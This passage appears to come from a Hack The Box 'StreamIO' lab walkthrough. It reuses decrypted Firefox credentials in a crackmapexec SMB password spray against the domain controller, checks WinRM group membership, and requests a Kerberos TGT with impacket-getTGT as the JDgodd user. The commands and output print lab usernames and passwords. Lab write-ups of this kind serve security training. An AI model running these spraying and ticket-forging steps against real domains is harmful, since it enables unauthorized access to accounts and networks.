JDgodd
A successful decryption of Firefox credential led to compromising 4 web credentials. While the web server used for authentication suggests another possible virtual host or sub-domain(slack.streamio.htb), those decrypted credentials must be validated as they appear rather different,
In the following sections, a domain-wide brute-force attack will be conducted to validate the credential of the JDgodd user
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ crackmapexec smb dc.streamio.htb -d STREAMIO.HTB -u domain_users.txt -p passwords.txt --continue-on-success
smb dc.streamio.htb 445 dc [*] windows 10.0 build 17763 x64 (name:DC) (domain:STREAMIO.HTB) (signing:True) (SMBv1:False)
[...REDACTED...]
smb dc.streamio.htb 445 dc [+] streamio.htb\nikk37:get_dem_girls2@yahoo.com
smb dc.streamio.htb 445 dc [+] streamio.htb\jdgodd:JDg0dd1s@d0p3cr3@t0r
[...REDACTED...]Password reuse confirmed
*evil-winrm* ps c:\> NET localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
Martin
nikk37
The command completed successfully.Since the JDgodd user is not part of the Remote Management Users group, I would need to proceed differently from here on out
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ impacket-getTGT streamio.htb/JDgodd@dc.streamio.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: JDg0dd1s@d0p3cr3@t0r
[*] Saving ticket in JDgodd@dc.streamio.htb.ccacheTGT generated for the JDgodd user
Lateral Movement made to the JDgodd user